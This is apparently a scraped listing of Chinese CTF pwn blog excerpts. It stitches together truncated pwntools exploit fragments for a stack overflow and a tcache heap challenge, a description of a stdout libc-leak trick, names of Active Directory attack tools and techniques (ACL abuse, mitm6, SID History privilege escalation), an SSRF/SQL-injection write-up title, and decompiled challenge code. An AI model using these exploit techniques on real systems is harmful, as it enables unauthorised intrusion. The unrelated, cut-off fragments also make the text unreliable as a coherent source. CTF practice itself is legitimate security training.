pwn import * p = process('./stack2') p.sendlineafter('you have:','1') p.sendline('Giveme your numbers','1') def change(a,b): p.sendlineafter('5. exit','3') p.recvuntil('which number to change:') p.sendline(str(a
难度系数5:刷题路线 ailx10:xctf-very_easy_sql(Gopher协议,SSRF漏洞和SQL时间盲注)
from pwn import * import sys libc = ELF("./libc-2.27.so") context.log_level = "debug" def new(idx:int, size:int): p.sendlineafter(b"Your choice: ", b"1") p.sendlineafter(b"Index: ", str(idx).encode()) p.sendlineafter(b"Size: ", str(size).encode()) def edit(idx:int...
今年的XCTF最后一战ACTF圆满结束了,战队最后也是稳住了19名,应该能拿到决赛门票。 但ACTF中,pwn题凄惨爆零。虽然只有俺做,但这不能成为摆烂的理由,毕竟要不断成长为战队主力,而且身边有很多很强的同龄师傅,更不应该气馁。 在军训途中复现了Tree_pwn,在uuu师傅(https://caffeine.darkflow.top/)的引导下学到了如...
Pwn three 三次chunk ,tcache 的利用,通过改stdout leak libc add(io,"0\n")add(io,"1\n")delete(io,0,"y")delete(io,1,"n")#libc_base, proc_base, heap_base = get_pie_addr()#print "libc_base:", hex(libc_base&0xffffff)#print "heap_base:", hex(heap_base&0xffff)heap_base=0x...
aclpwn.py Invoke-ACLPwn Abusing IPv6 with mitm6 Compromising IPv4 networks via IPv6 mitm6 SID History Abuse WUT IS DIS?: If we manage to compromise a child domain of a forest andSID filteringisn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain ...
("* An easy calc *"); puts("*Give me your numbers and I will return to you an average *"); puts("*(0 <= x < 256) *"); puts("***"); puts("How many numbers you have:"); __isoc99_scanf("%d", &v5); puts("Give me your numbers"); for ( i = 0; i < v5 && (...